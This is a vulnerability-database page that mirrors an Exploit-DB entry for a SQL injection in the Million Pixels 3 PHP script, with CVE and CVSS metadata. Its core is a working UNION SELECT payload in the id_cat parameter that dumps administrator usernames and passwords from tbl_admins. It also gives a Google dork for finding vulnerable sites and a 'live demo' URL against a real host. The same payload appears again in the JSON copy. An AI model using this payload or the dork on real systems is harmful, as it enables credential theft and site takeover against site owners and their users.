Search...

Million Pixels 3 id_cat Remote SQL Injection Vulnerability

2008-07-11T00:00:00

ID EDB-ID:6044
Type exploitdb
Reporter Hussin X
Modified 2008-07-11T00:00:00

Description

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability. CVE-2008-3204,CVE-2008-4055. Webapps exploit for php platform

                                        
                                            #################################################################
#
#   Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
#                                                       =
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#                                                       =
#                                                       =
#========================================================
#     
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK  :  inurl: "tops_top.php? id_cat ="     
#################################################################

Exploit:  


www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




L!VE DEMO:


http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




########################( Greetz )###########################
#                                                           #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
#                                                           #    
#         Iraqihack / FAHD / mos_chori / Silic0n            #
#                                                           #
#############################################################

                       Im IRAQi

# milw0rm.com [2008-07-11]

JSON Vulners Source

Initial Source

{"published": "2008-07-11T00:00:00", "id": "EDB-ID:6044", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "1dcc31dd1727446a34b52dfd7119ac3e9a34b10bb20adba88f3c04951aba6573", "description": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability. CVE-2008-3204,CVE-2008-4055. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/6044/", "lastseen": "2016-01-31T23:05:45", "edition": 1, "title": "Million Pixels 3 id_cat Remote SQL Injection Vulnerability", "osvdbidlist": ["47021"], "modified": "2008-07-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2008-4055", "CVE-2008-3204"], "sourceHref": "https://www.exploit-db.com/download/6044/", "references": [], "reporter": "Hussin X", "sourceData": "#################################################################\n#\n# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability\n#\n#========================================================\n# =\n# Author: Hussin X =\n# =\n# Home : www.tryag.cc/cc\n# =\n# email: darkangel_g85[at]Yahoo[DoT]com =\n# =\n# =\n#========================================================\n# \n# script : http://e-topbiz.com/oprema/pages/millionpixels3.php\n#\n# DorK : inurl: \"tops_top.php? id_cat =\" \n#################################################################\n\nExploit: \n\n\nwww.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*\n\n\n\n\nL!VE DEMO:\n\n\nhttp://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*\n\n\n\n\n########################( Greetz )###########################\n# #\n# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #\n# # \n# Iraqihack / FAHD / mos_chori / Silic0n #\n# #\n#############################################################\n\n Im IRAQi\n\n# milw0rm.com [2008-07-11]\n", "objectVersion": "1.2"}

{"result": {"cve": [{"id": "CVE-2008-4055", "type": "cve", "title": "CVE-2008-4055", "description": "SQL injection vulnerability in tops_top.php in Million Pixel Ad Script (Million Pixel Script) allows remote attackers to execute arbitrary SQL commands via the id_cat parameter.", "published": "2008-09-11T17:06:48", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4055", "cvelist": ["CVE-2008-4055"], "lastseen": "2016-09-03T11:01:20"}, {"id": "CVE-2008-3204", "type": "cve", "title": "CVE-2008-3204", "description": "SQL injection vulnerability in tops_top.php in E-topbiz Million Pixels 3 allows remote attackers to execute arbitrary SQL commands via the id_cat parameter.", "published": "2008-07-17T09:41:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3204", "cvelist": ["CVE-2008-3204"], "lastseen": "2017-09-29T14:25:59"}]}}